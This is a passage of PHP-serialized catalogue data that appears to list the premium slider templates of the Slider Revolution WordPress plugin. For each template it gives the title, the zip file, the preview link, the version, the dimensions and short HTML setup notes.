Freedom\";s:5:\"alias\";s:15:\"creativefreedom\";s:3:\"zip\";s:19:\"creativefreedom.zip\";s:3:\"uid\";s:32:\"8902bf6c93126c2c6323626b9e872621\";s:3:\"img\";s:26:\"creativefreedom/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-touch-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A full-screen slider with a unique vertical navigation and 3D-parallax effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:290:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images, videos and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:44;a:22:{s:2:\"id\";s:2:\"45\";s:5:\"title\";s:17:\"3D Parallax Scene\";s:5:\"alias\";s:13:\"parallaxscene\";s:3:\"zip\";s:17:\"parallaxscene.zip\";s:3:\"uid\";s:32:\"51566f1ce649708e97a0f5dfaf05ea19\";s:3:\"img\";s:24:\"parallaxscene/slide1.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-3d-parallax/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"700\";s:11:\"description\";s:328:\"<span class=\"ttm_content\">A 3D-parallax hero scene with mouse-controlled effects. Smart image arrangement creates a convincing 3D effect. Tooltips are shown using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a>.</span>\r\n</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:45;a:22:{s:2:\"id\";s:2:\"46\";s:5:\"title\";s:10:\"Wow Factor\";s:5:\"alias\";s:15:\"slidingoverlays\";s:3:\"zip\";s:19:\"slidingoverlays.zip\";s:3:\"uid\";s:32:\"18002d17e8bc7ca61b0951f5305a759e\";s:3:\"img\";s:26:\"slidingoverlays/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/responsive-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:106:\"<span class=\"ttm_content\">A 3D-parallax effect full-screen slider.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:446:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:46;a:22:{s:2:\"id\";s:2:\"47\";s:5:\"title\";s:14:\"3D Web Product\";s:5:\"alias\";s:25:\"web-product-light-hero-3d\";s:3:\"zip\";s:29:\"web-product-light-hero-3d.zip\";s:3:\"uid\";s:32:\"efd345c5da805414093e46066cefd751\";s:3:\"img\";s:36:\"web-product-light-hero-3d/slide1.jpg\";s:7:\"preview\";s:52:\"http://revolution.themepunch.com/wordpress-3d-scene/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"668\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A 3D-parallax hero scene slider with a convincing depth-effect and animated clouds.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:47;a:22:{s:2:\"id\";s:2:\"48\";s:5:\"title\";s:15:\"WooCommerce Big\";s:5:\"alias\";s:6:\"woobig\";s:3:\"zip\";s:10:\"woobig.zip\";s:3:\"uid\";s:32:\"bfb09a39656c7c80e86b468fc5b3403c\";s:3:\"img\";s:17:\"woobig/slide1.jpg\";s:7:\"preview\";s:52:\"http://revolution.themepunch.com/woocommerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:173:\"<span class=\"ttm_content\">This slider is automatically populated by WooCommerce posts. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"WooCommerce Slider\"</a>. Make sure to select the products you want to show in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";i:2;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:48;a:22:{s:2:\"id\";s:2:\"49\";s:5:\"title\";s:17:\"WooCommerce Small\";s:5:\"alias\";s:16:\"woocommercesmall\";s:3:\"zip\";s:20:\"woocommercesmall.zip\";s:3:\"uid\";s:32:\"b17c2adcc5c4c4b68a7ac6fee32fa030\";s:3:\"img\";s:27:\"woocommercesmall/slide1.jpg\";s:7:\"preview\";s:52:\"http://revolution.themepunch.com/woocommerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"266\";s:11:\"description\";s:174:\" <span class=\"ttm_content\">This slider is automatically populated by WooCommerce posts. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"WooCommerce Slider\"</a>. Make sure to select the products you want to show in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";i:2;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:49;a:22:{s:2:\"id\";s:2:\"50\";s:5:\"title\";s:17:\"Restaurant Header\";s:5:\"alias\";s:10:\"finedining\";s:3:\"zip\";s:14:\"finedining.zip\";s:3:\"uid\";s:32:\"03481a9e258501fbe3888b48830ea845\";s:3:\"img\";s:21:\"finedining/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/restaurant-hero-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:275:\"<span class=\"ttm_content\">A full-screen hero block slider that shows different background layers on button hover using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a>.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:464:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:50;a:22:{s:2:\"id\";s:2:\"51\";s:5:\"title\";s:21:\"Agency Website Header\";s:5:\"alias\";s:12:\"agency-intro\";s:3:\"zip\";s:16:\"agency-intro.zip\";s:3:\"uid\";s:32:\"e9be2afdd55a0c8d0d8d0cc12ba4c82f\";s:3:\"img\";s:23:\"agency-intro/slide1.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/agency-website-hero-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:302:\" <span class=\"ttm_content\">A full-screen hero block slider with ken burns effect and video modal on button click. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to achieve this effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:51;a:22:{s:2:\"id\";s:2:\"52\";s:5:\"title\";s:11:\"Team Slider\";s:5:\"alias\";s:7:\"ourteam\";s:3:\"zip\";s:11:\"ourteam.zip\";s:3:\"uid\";s:32:\"d8eb1fec07a79202d1118bb17f70c233\";s:3:\"img\";s:18:\"ourteam/slide1.jpg\";s:7:\"preview\";s:74:\"http://revolution.themepunch.com/thumbnail-hover-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.4\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:303:\"<span class=\"ttm_content\">A team slider that changes slides and displays additional information on thumbnail hover. It uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to achieve this effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:657:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\nLearn how to <a href=\"https://www.themepunch.com/faq/modify-thumbnails-for-our-team-template/\" target=\"_blank\">modify the thumbnails</a><br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:52;a:22:{s:2:\"id\";s:2:\"53\";s:5:\"title\";s:13:\"Team Carousel\";s:5:\"alias\";s:17:\"our-team-carousel\";s:3:\"zip\";s:21:\"our-team-carousel.zip\";s:3:\"uid\";s:32:\"37656d5dcab1f265c025cb2a3d669809\";s:3:\"img\";s:26:\"ourteamcarousel/slide1.jpg\";s:7:\"preview\";s:83:\"http://revolution.themepunch.com/thumbnail-hover-carousel-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.4\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:306:\" <span class=\"ttm_content\">A team carousel that changes slides and displays additional information on thumbnail hover. It uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to achieve this effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:659:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\nLearn how to <a href=\"https://www.themepunch.com/faq/modify-thumbnails-for-our-team-template/\" target=\"_blank\">modify the thumbnails</a><br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:53;a:22:{s:2:\"id\";s:2:\"54\";s:5:\"title\";s:17:\"4K Youtube Slider\";s:5:\"alias\";s:13:\"betteryoutube\";s:3:\"zip\";s:17:\"betteryoutube.zip\";s:3:\"uid\";s:32:\"d7c5fef9f257037d7a148038aa2a1857\";s:3:\"img\";s:24:\"betteryoutube/slide1.jpg\";s:7:\"preview\";s:94:\"http://revolution.themepunch.com/fullscreen-4k-youtube-video-gallery-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.1.4\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"675\";s:11:\"description\";s:293:\" <span class=\"ttm_content\">A full-screen youtube gallery with 4K videos as an example. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to breathe life into navigation elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:535:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change videos and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:54;a:22:{s:2:\"id\";s:2:\"55\";s:5:\"title\";s:21:\"Agency Website Header\";s:5:\"alias\";s:19:\"agencywebsiteheader\";s:3:\"zip\";s:23:\"agencywebsiteheader.zip\";s:3:\"uid\";s:32:\"c11d272c87277a7a38d9e7fd13e27947\";s:3:\"img\";s:30:\"agencywebsiteheader/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/fullscreen-hero-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:245:\" <span class=\"ttm_content\">A very unique full-screen slider that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:509:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:55;a:22:{s:2:\"id\";s:2:\"56\";s:5:\"title\";s:11:\"Coming Soon\";s:5:\"alias\";s:10:\"comingsoon\";s:3:\"zip\";s:14:\"comingsoon.zip\";s:3:\"uid\";s:32:\"0f89edf995512e6d6e864a2ee7221829\";s:3:\"img\";s:21:\"comingsoon/slide1.jpg\";s:7:\"preview\";s:79:\"http://revolution.themepunch.com/coming-soon-wordpress-under-construction-site/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:299:\"<span class=\"ttm_content\">A full-screen slider that can be used as a \"Coming Soon\" page. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to achieve various interaction possibilities.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:638:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\nInstructions for <a href=\"https://www.themepunch.com/faq/change-date-for-coming-soon-template/\" target=\"_blank\">how to change the date.</a><br /><br />\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:56;a:22:{s:2:\"id\";s:2:\"57\";s:5:\"title\";s:20:\"Christmas Snow Scene\";s:5:\"alias\";s:9:\"snowscene\";s:3:\"zip\";s:13:\"snowscene.zip\";s:3:\"uid\";s:32:\"a747bf0837caff86c62419a746690209\";s:3:\"img\";s:20:\"snowscene/slide1.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/christmas-snow-scene/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:141:\"<span class=\"ttm_content\">A slider with multiple christmas themed slides and a neat snow fall effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:485:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:57;a:22:{s:2:\"id\";s:2:\"58\";s:5:\"title\";s:15:\"Rock Band Music\";s:5:\"alias\";s:8:\"rockband\";s:3:\"zip\";s:12:\"rockband.zip\";s:3:\"uid\";s:32:\"5f557a5fad2fd6ca982a6ae6e9619637\";s:3:\"img\";s:19:\"rockband/slide1.jpg\";s:7:\"preview\";s:80:\"http://revolution.themepunch.com/rock-band-music-theme-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:140:\" <span class=\"ttm_content\">A rock band themed hero block slider with an embedded SoundCloud element.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:464:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:58;a:22:{s:2:\"id\";s:2:\"59\";s:5:\"title\";s:18:\"Sleek Landing Page\";s:5:\"alias\";s:16:\"sleeklandingpage\";s:3:\"zip\";s:20:\"sleeklandingpage.zip\";s:3:\"uid\";s:32:\"07f7f2608936a8ae226213b7d99eee3f\";s:3:\"img\";s:27:\"sleeklandingpage/slide1.jpg\";s:7:\"preview\";s:70:\"http://revolution.themepunch.com/landing-page-free-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:191:\"<span class=\"ttm_content\">A full-screen slider that can be used as an App-Landing-Page. The object layers and custom animations create a unique effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-22 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:59;a:22:{s:2:\"id\";s:2:\"60\";s:5:\"title\";s:16:\"App Landing Page\";s:5:\"alias\";s:14:\"applandingpage\";s:3:\"zip\";s:18:\"applandingpage.zip\";s:3:\"uid\";s:32:\"38eb600893c1484ab8fd2a3dce3678d7\";s:3:\"img\";s:25:\"applandingpage/slide1.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/app-landing-page-free-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:263:\"<span class=\"ttm_content\">A full-screen hero block that can be used as an app landing page. The detail view is build using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a>.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:60;a:22:{s:2:\"id\";s:2:\"61\";s:5:\"title\";s:10:\"Desk Scene\";s:5:\"alias\";s:9:\"deskscene\";s:3:\"zip\";s:13:\"deskscene.zip\";s:3:\"uid\";s:32:\"172a1a89a3e3b333cb4dbeb238f534c5\";s:3:\"img\";s:20:\"deskscene/slide1.jpg\";s:7:\"preview\";s:49:\"http://revolution.themepunch.com/hero-desk-scene/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:135:\"<span class=\"ttm_content\">A beautiful desk scene with a cool reveal effect when scrolling down.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:61;a:22:{s:2:\"id\";s:2:\"62\";s:5:\"title\";s:17:\"Clean News Slider\";s:5:\"alias\";s:15:\"cleannewsslider\";s:3:\"zip\";s:19:\"cleannewsslider.zip\";s:3:\"uid\";s:32:\"82c3f521fe31b80984be0f19e1a9899e\";s:3:\"img\";s:26:\"cleannewsslider/slide1.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-news-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:132:\"<span class=\"ttm_content\">A slideshow example with clean content and thumbnail navigation.</span>\r\n<span 